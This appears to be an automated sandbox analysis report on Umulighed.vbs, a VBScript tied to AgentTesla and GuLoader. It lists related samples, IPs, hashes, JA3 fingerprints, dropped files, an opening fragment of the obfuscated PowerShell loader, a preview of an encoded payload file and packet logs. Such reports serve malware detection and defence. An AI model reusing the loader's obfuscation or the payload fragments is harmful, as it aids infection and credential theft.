                                                        Zapytanie ofertowe (7427-23 ROCKFIN).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • ip-api.com/line/?fields=hosting
                                                        orden de compra.vbsGet hashmaliciousAgentTeslaBrowse
                                                        • ip-api.com/line/?fields=hosting
                                                        G4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • ip-api.com/line/?fields=hosting
                                                        RICHIESTA-QUOTAZIONI.jarGet hashmaliciousSTRRATBrowse
                                                        • ip-api.com/json/
                                                        explorer.exeGet hashmaliciousRedLine, XWormBrowse
                                                        • ip-api.com/line/?fields=hosting
                                                        114.142.162.17http://otahuhumainstreet.co.nzGet hashmaliciousUnknownBrowse
                                                        • otahuhumainstreet.co.nz/

                                                        Domains

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        ip-api.comDhl Express Shipping Docs .pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.95.112.1
                                                        r)_78768.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.95.112.1
                                                        e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.95.112.1
                                                        DAIKIN AC SPAIN 2024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 208.95.112.1
                                                        transferencia.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 208.95.112.1
                                                        Zapytanie ofertowe (7427-23 ROCKFIN).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 208.95.112.1
                                                        orden de compra.vbsGet hashmaliciousAgentTeslaBrowse
                                                        • 208.95.112.1
                                                        G4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 208.95.112.1
                                                        RICHIESTA-QUOTAZIONI.jarGet hashmaliciousSTRRATBrowse
                                                        • 208.95.112.1
                                                        explorer.exeGet hashmaliciousRedLine, XWormBrowse
                                                        • 208.95.112.1
                                                        mail.cash4cars.nztransferencia.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 114.142.162.17
                                                        Zapytanie ofertowe (7427-23 ROCKFIN).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 114.142.162.17
                                                        Factura240413227178.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 114.142.162.17
                                                        DHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 114.142.162.17
                                                        G4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 114.142.162.17
                                                        Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 114.142.162.17
                                                        rPayment_AdviceJ001222042024.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 114.142.162.17
                                                        charesworh.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 114.142.162.17
                                                        FAR.N#U00b02430-24000993.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 114.142.162.17
                                                        tems.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 114.142.162.17

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        SERVERMULE-AS-APNimbus2PtyLtdAUtransferencia.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 114.142.162.17
                                                        Zapytanie ofertowe (7427-23 ROCKFIN).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 114.142.162.17
                                                        Factura240413227178.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 114.142.162.17
                                                        DHL Shipping doc.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 114.142.162.17
                                                        G4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 114.142.162.17
                                                        Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 114.142.162.17
                                                        rPayment_AdviceJ001222042024.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 114.142.162.17
                                                        charesworh.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 114.142.162.17
                                                        FAR.N#U00b02430-24000993.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 114.142.162.17
                                                        tems.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 114.142.162.17
                                                        TUT-ASUSDhl Express Shipping Docs .pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.95.112.1
                                                        r)_78768.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.95.112.1
                                                        e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 208.95.112.1
                                                        DAIKIN AC SPAIN 2024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 208.95.112.1
                                                        transferencia.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 208.95.112.1
                                                        Zapytanie ofertowe (7427-23 ROCKFIN).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 208.95.112.1
                                                        orden de compra.vbsGet hashmaliciousAgentTeslaBrowse
                                                        • 208.95.112.1
                                                        G4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 208.95.112.1
                                                        RICHIESTA-QUOTAZIONI.jarGet hashmaliciousSTRRATBrowse
                                                        • 208.95.112.1
                                                        explorer.exeGet hashmaliciousRedLine, XWormBrowse
                                                        • 208.95.112.1

                                                        JA3 Fingerprints

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        3b5074b1b5d032e5620f69f9f700ff0eload_startup.txt.ps1Get hashmaliciousUnknownBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101
                                                        M_F+niestandardowy stempel.xlsx.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101
                                                        https://u44056869.ct.sendgrid.net/ls/click?upn=u001.nH1ryR-2Btr2av-2Bkfc8quLEXKlGRKFonctFf3nB-2FAP-2Bjae3IsQgCoKtK-2FQ57cEEmmhZzRyd07G16kQ6rsc4EaJT6S7Rh48kOVsBPHV-2Fkkk9Vfz7cojLOCLuj4sUGVMM7pbdmwtinmtiLhfYkhEkgve628OiJsccHyeYc3lkmkn6epsOmmj4-2Fi-2BWjxfm73m7vUzCOGnDWnQJBmmd6DmkDcfIw-3D-3DU_vL_MRfqZW9nS4IDBSHT8MfJfSAq9b0aOVvtJoUhpW1Ga8ePAnfV-2FfXwE0xIGnayeXag21qNKRc5VLcgMkPlIuCBf7Hi8EFUvj1-2FlklJpMLZNx1IQq8eO26tVdmeuxhGn-2B2zjA71oEkiC9pTrxX9Dz-2FMJk8mkJr62ye1KlBo-2B8fxBlVl-2B6T0POpB0GKoibGhcjh4Z-2FnPU453nMAkUkNy65MlaA-3D-3DGet hashmaliciousHTMLPhisherBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101
                                                        F#U0130YAT TEKL#U0130F.exeGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101
                                                        New DHL Shipment Document Arrival Notice.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101
                                                        hesaphareketi_1.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101
                                                        e-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101
                                                        e-dekont.exeGet hashmaliciousSnake KeyloggerBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101
                                                        DAIKIN AC SPAIN 2024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101
                                                        transferencia.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101
                                                        37f463bf4616ecd445d4a1937da06e19rq0mVjR9ar.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101
                                                        responsibilityleadpro.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101
                                                        8jvTeVxooN.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101
                                                        #U0421#U041f#U0426 #U2116130 #U043e#U0442 12.04.2024 #U043f#U043e#U0434#U043f#U0438#U0441..exeGet hashmaliciousGuLoader, RemcosBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101
                                                        DAIKIN AC SPAIN 2024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101
                                                        transferencia.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101
                                                        1000901 LIQUIDACION.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101
                                                        Zapytanie ofertowe (7427-23 ROCKFIN).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101
                                                        Factura240413227178.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101
                                                        Price request N#U00b0DEM23000199.jsGet hashmaliciousAsyncRAT, PureLog Stealer, RedLineBrowse
                                                        • 142.251.2.132
                                                        • 142.251.2.101

                                                        Dropped Files

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        C:\Users\user\AppData\Roaming\newfile\newfile.exeDAIKIN AC SPAIN 2024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                          transferencia.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                            Zapytanie ofertowe (7427-23 ROCKFIN).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              G4-TODOS.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.htaGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                  rPayment_AdviceJ001222042024.batGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                    Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                      Request for Proposal Quote_2414976#U00b7pdf.vbsGet hashmaliciousGuLoader, LokibotBrowse
                                                                        Documentos adjuntos.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                          20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.vbeGet hashmaliciousAgentTesla, GuLoaderBrowse

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):11608
                                                                            Entropy (8bit):4.886255615007755
                                                                            Encrypted:false
                                                                            SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                                            MD5:C7F7A26360E678A83AFAB85054B538EA
                                                                            SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                                            SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                                            SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):64
                                                                            Entropy (8bit):1.1940658735648508
                                                                            Encrypted:false
                                                                            SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                                            MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                                            SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                                            SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                                            SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                                            Malicious:false
                                                                            Preview:@...e................................................@..........

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kv1ep3h.uqt.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_arxcys0t.gux.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dymm4kuh.4yf.psm1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zjxdvaew.bfw.ps1

                                                                            Download File
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Roaming\Klapjagters.Sep

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):500988
                                                                            Entropy (8bit):5.9507784897943035
                                                                            Encrypted:false
                                                                            SSDEEP:6144:6jYnEf6zRdygMSLtIr00cxh5uUuKL6DscbBxSfBleJCxPCXHAV5TgDp2ILM:6UEfMdyktIr0hv+KLCBbBIlewPCiUUIo
                                                                            MD5:E776173D5EC38DBAB15C13C2FDBA9675
                                                                            SHA1:2FCDE3121765EA5BCE929C1B93E2CF341B0790B6
                                                                            SHA-256:2884060CE4900B4D65002A8F8E5A7B1839EC9701A8FF3242BAC0D5F307648958
                                                                            SHA-512:89AAF5C9EC69ECE51FC7B2CD48B8323F26D3BBB230A891ADC3923884633EB0B409C1E5F6E9A070044058F0F7E4DCAC3AA246B3017A3DF0BD7BE9ADF3BA94A982
                                                                            Malicious:false
                                                                            Preview:6wJNG+sCYiS7CpMbAOsCnqRxAZsDXCQEcQGbcQGbuSducg9xAZtxAZuB8Z/apRRxAZvrAhAlgcFISyjk6wL4X+sCLp1xAZtxAZu6+gSIqusCmlnrAoZR6wJds+sCW2UxynEBm+sCNP2JFAvrAjSo6wJlhtHicQGbcQGbg8EE6wJflXEBm4H5ts88A3zKcQGbcQGbi0QkBOsCoLlxAZuJw+sCQDdxAZuBw3IgmwLrAi4M6wI0aLrM7w1ZcQGbcQGbgeq+kidS6wI+0+sCA/KBwvKiGflxAZvrAvOH6wIA6OsC1PvrAhRkcQGbiwwQ6wIo8esCvr+JDBPrAmm/cQGbQusCs87rAoBkgfosTQUAddPrAkeT6wJHVolcJAzrAgqGcQGbge0AAwAAcQGb6wJQTYtUJAhxAZtxAZuLfCQE6wIVE3EBm4nrcQGb6wLWPYHDnAAAAHEBm+sChFtT6wJVDXEBm2pAcQGbcQGbietxAZvrAjUDx4MAAQAAAHBbA3EBm3EBm4HDAAEAAOsCDkZxAZtTcQGbcQGbietxAZvrAgIPibsEAQAA6wJKvOsC3TCBwwQBAADrAqrycQGbU+sCTzDrAv3yav9xAZtxAZuDwgXrApfQ6wJa7zH26wKGzusCIskxyesCL9RxAZuLGusCXJ5xAZtB6wL5CnEBmzkcCnXzcQGbcQGbRusCjOBxAZuAfAr7uHXe6wLNO3EBm4tECvzrAnaX6wKKgynw6wLZmHEBm//S6wJq93EBm7osTQUA6wJnB+sCpoAxwHEBm3EBm4t8JAxxAZtxAZuBNAdUYKG66wLXu+sCTMyDwATrAm8r6wJ8CznQdeLrAmn2cQGbiftxAZvrAkFr/9dxAZtxAZvRuyhf3S1KA8HqmlzVkbvg3tsgS1VdkwXVkS9U14KIdt8tSu/dhRjgLT86O5X6bgpX4WA2sh1SO70IjjTGBiRhkySsugnHcPrVFKy6jcHWvNGqIM5ZYN57DNDHO65y

                                                                            C:\Users\user\AppData\Roaming\newfile\newfile.exe

                                                                            Download File
                                                                            Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):516608
                                                                            Entropy (8bit):6.035530871194082
                                                                            Encrypted:false
                                                                            SSDEEP:12288:TTx5KRZ18xtSP+szdcIugOO50MMEMOkP:QmxtSP+sJ+O5FWPP
                                                                            MD5:251E51E2FEDCE8BB82763D39D631EF89
                                                                            SHA1:677A3566789D4DA5459A1ECD01A297C261A133A2
                                                                            SHA-256:2682086ACE1970D5573F971669591B731F87D749406927BD7A7A4B58C3C662E9
                                                                            SHA-512:3B49E6D9197B12CA7AA282707D62496D9FEAC32B3F6FD15AFFD4EAAA5239DA903FADD4600A1D17A45EC330A590FC86218C9A7DC20306B52D8170E04B0E325521
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Joe Sandbox View:
                                                                            • Filename: DAIKIN AC SPAIN 2024.vbs, Detection: malicious, Browse
                                                                            • Filename: transferencia.vbs, Detection: malicious, Browse
                                                                            • Filename: Zapytanie ofertowe (7427-23 ROCKFIN).vbs, Detection: malicious, Browse
                                                                            • Filename: G4-TODOS.vbs, Detection: malicious, Browse
                                                                            • Filename: Gesti#U00f3n Pago a Proveedores - Liquidaci#U00f3n anticipo.hta, Detection: malicious, Browse
                                                                            • Filename: rPayment_AdviceJ001222042024.bat, Detection: malicious, Browse
                                                                            • Filename: Copy of Poseidon Marine 4th monthly Stores Apr 2024 R3 .xls.vbs, Detection: malicious, Browse
                                                                            • Filename: Request for Proposal Quote_2414976#U00b7pdf.vbs, Detection: malicious, Browse
                                                                            • Filename: Documentos adjuntos.vbe, Detection: malicious, Browse
                                                                            • Filename: 20220829_PEDIDO_22073M_PROTECO_LIMPIEZA_Y_KITS.vbe, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

                                                                            Static File Info

                                                                            General

                                                                            File type:ASCII text, with very long lines (359), with CRLF line terminators
                                                                            Entropy (8bit):5.390157238510706
                                                                            TrID:
                                                                            • Visual Basic Script (13500/0) 100.00%
                                                                            File name:Umulighed.vbs
                                                                            File size:8'147 bytes
                                                                            MD5:7a879857b435057c4825e33b280baa15
                                                                            SHA1:d79ea735b0440d929bb6b046974e03915cb8bfd8
                                                                            SHA256:d15c94ea77716eb5071b879c630b22509e0cee099bb7f9d3f823b8fb57f77d6d
                                                                            SHA512:ce99bb30f9ec43e74e6cf4ad7bd53759f94c895670662cf796d5bb84dd041da52e3012f5251f3a23ef13be1c1f3a51bb67b65825d24f544eaf79626f29dc77c8
                                                                            SSDEEP:96:qpAwOjfFFxwSH5YMsAFCVONt/cpxFSQ3nTQG0Q/WFRtBHXNFmkOtvZ6XV5qRAswT:qp1OjhH5lBg4UpxM5yKpHuBOVcAh+29P
                                                                            TLSH:8AF13B1D11663CAF13BE0E647792089FD9A92E3DD542EC507259C5C1265E6B82A3F88C
                                                                            File Content Preview:.. ..Function Sodavander ......D8 = D8 & "$Unbumped = 1;$Svveflyvers='Substrin';$Svveflyvers+='g';Function Disken($Sthamrenes){$Hotelvrelserne=$Sthamrenes.Length-$Unbumped;For($Acned=5; $Acned -lt $Hotelvrelserne; $Acned+=(6)){$Professorships+=$Sthamrenes

                                                                            File Icon

                                                                            Icon Hash:68d69b8f86ab9a86

                                                                            Network Behavior

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Apr 24, 2024 10:11:59.088108063 CEST49730443192.168.2.4142.251.2.101
                                                                            Apr 24, 2024 10:11:59.088141918 CEST44349730142.251.2.101192.168.2.4
                                                                            Apr 24, 2024 10:11:59.088243008 CEST49730443192.168.2.4142.251.2.101
                                                                            Apr 24, 2024 10:11:59.098905087 CEST49730443192.168.2.4142.251.2.101
                                                                            Apr 24, 2024 10:11:59.098922968 CEST44349730142.251.2.101192.168.2.4
                                                                            Apr 24, 2024 10:11:59.466784954 CEST44349730142.251.2.101192.168.2.4
                                                                            Apr 24, 2024 10:11:59.466873884 CEST49730443192.168.2.4142.251.2.101
                                                                            Apr 24, 2024 10:11:59.467922926 CEST44349730142.251.2.101192.168.2.4
                                                                            Apr 24, 2024 10:11:59.467995882 CEST49730443192.168.2.4142.251.2.101
                                                                            Apr 24, 2024 10:11:59.471906900 CEST49730443192.168.2.4142.251.2.101
                                                                            Apr 24, 2024 10:11:59.471915960 CEST44349730142.251.2.101192.168.2.4
                                                                            Apr 24, 2024 10:11:59.472246885 CEST44349730142.251.2.101192.168.2.4
                                                                            Apr 24, 2024 10:11:59.483926058 CEST49730443192.168.2.4142.251.2.101
                                                                            Apr 24, 2024 10:11:59.528115034 CEST44349730142.251.2.101192.168.2.4
                                                                            Apr 24, 2024 10:11:59.867569923 CEST44349730142.251.2.101192.168.2.4
                                                                            Apr 24, 2024 10:11:59.867666960 CEST49730443192.168.2.4142.251.2.101
                                                                            Apr 24, 2024 10:11:59.867691040 CEST44349730142.251.2.101192.168.2.4
                                                                            Apr 24, 2024 10:11:59.867703915 CEST44349730142.251.2.101192.168.2.4
                                                                            Apr 24, 2024 10:11:59.867753983 CEST49730443192.168.2.4142.251.2.101
                                                                            Apr 24, 2024 10:11:59.870172977 CEST49730443192.168.2.4142.251.2.101
                                                                            Apr 24, 2024 10:12:00.051837921 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:00.051887035 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:00.051964998 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:00.052350998 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:00.052367926 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:00.423805952 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:00.423899889 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:00.426632881 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:00.426641941 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:00.427047968 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:00.428046942 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:00.472119093 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.321341991 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.321537018 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.333622932 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.333885908 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.358589888 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.358897924 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.371089935 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.421494007 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.421513081 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.468400002 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.497595072 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.503177881 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.503273010 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.503356934 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.503372908 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.503420115 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.515850067 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.528525114 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.528645039 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.528723955 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.528733969 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.528860092 CEST49731443192.168.2.4142.251.2.132
                                                                            Apr 24, 2024 10:12:01.541748047 CEST44349731142.251.2.132192.168.2.4
                                                                            Apr 24, 2024 10:12:01.554228067 CEST44349731142.251.2.132192.168.2.4
